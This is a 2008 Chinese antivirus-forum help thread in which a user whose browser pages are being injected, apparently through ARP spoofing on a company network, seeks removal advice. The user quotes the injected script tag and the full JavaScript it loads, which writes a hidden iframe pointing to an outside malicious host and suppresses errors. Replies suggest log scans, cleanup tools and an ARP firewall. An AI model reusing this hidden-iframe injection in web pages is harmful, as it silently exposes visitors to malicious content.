瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 昨天中路个病毒,请教怎么处理!在线等!!!
郁闷浪人 - 2008-7-16 10:33:00
昨天上了几个门户站,忽然发现页面字体比较乱,后来看原代码,不知道中了个什么病毒,至今还没搞定!请教各位!
具体如下:
在页面中都插入了这个代码:<script language="javascript" SRC="http://g.2b6fe62a.info/css.js"></script

导致网页中字体变大或者半天乱,对不齐!
请教怎么处理啊!!!!

此JS文件如下:

document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://g.2b6fe62a.info/ads.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2)
aaccbbdd - 2008-7-16 10:38:00
扫日志前关闭无用进程,如QQ,迅雷

到大的软件站,如天空,太平洋,下载2.6正式版版的SReng(推荐)

http://www.skycn.com/soft/45002.html
SREng/智能扫描

等扫描完成,保存日志(LOG格式)
日志以附件上传,贴到反病毒区或流行病毒区
PS:如主程序SREng**.exe无法运行,导致无法扫描日志
将主程序改名为小狮子.bat
郁闷浪人 - 2008-7-16 10:51:00
恩,测试日志见附件,请教怎么处理!在线等!
补充一下,这个病毒有时候出现又时候又没有,
出现的时候就是网页版面乱,不出现的时候就正常了!

附件: SREngLOG.log
aaccbbdd - 2008-7-16 10:58:00
日志正常
Lz是不是在局域网??
小日来了 - 2008-7-16 11:02:00
用附件的工具,把这段代码,搜索并清除

http://g.2b6fe62a.info/css.js"></script>

附件: iframekill.rar
郁闷浪人 - 2008-7-16 11:05:00
对,公司局域网!没问题吗?
反正出问题就是版面乱套,不出问题就都正常了!
时好时坏啊,怎么处理呢?
郁闷浪人 - 2008-7-16 11:07:00
具体怎么做呀?多谢!
aaccbbdd - 2008-7-16 11:11:00


引用:
原帖由 郁闷浪人 于 2008-7-16 11:05:00 发表
对,公司局域网!没问题吗?
反正出问题就是版面乱套,不出问题就都正常了!
时好时坏啊,怎么处理呢?


Lz安装360ARP防火墙
http://www.360.cn/down/soft_down11.html

单位的计算机都要安装!
郁闷浪人 - 2008-7-16 11:13:00
啊,那个iframekill.rar也没搞定!
这个应该是网页病毒吧??应该不是ARP病毒哦!
郁闷浪人 - 2008-7-16 11:19:00


第一个图是中病毒时页面没对齐,下面字很大,超出了框框范围!
第二个图是网页源码,最上面一行就是插入的病毒代码。
用雅虎助手和360安全卫士修复过IE,但没用!
没人能解决吗?郁闷啊~
继续在线等!
郁闷浪人 - 2008-7-16 11:31:00
还有没有人能帮忙啊! 急呀~~ 在线等!!!
开心101 - 2008-7-16 11:55:00
1.建议使用XDelBox删除以下文件:(XDelBox1.3下载)
使用说明:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择从剪贴板导入,导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作。运行xdelbox前最好卸载所有可移动存储介质(包括U盘,MP3,手机存储卡等)。

c:\windows\system32\npkycryp.sys

2.删除重启后使用SREng修复下面各项:

    启动项目 -- 服务-- 驱动程序之如下项删除:
[npkycryp / npkycryp]    <\??\C:\WINDOWS\system32\npkycryp.sys>

下面这个不知道是什么
C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work
迅雷看看的?
若叶风吹雪 - 2008-7-16 12:09:00
C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work就是迅雷看看……删不删无所谓的
1
查看完整版本: 昨天中路个病毒,请教怎么处理!在线等!!!
© 2000 - 2026 Rising Corp. Ltd.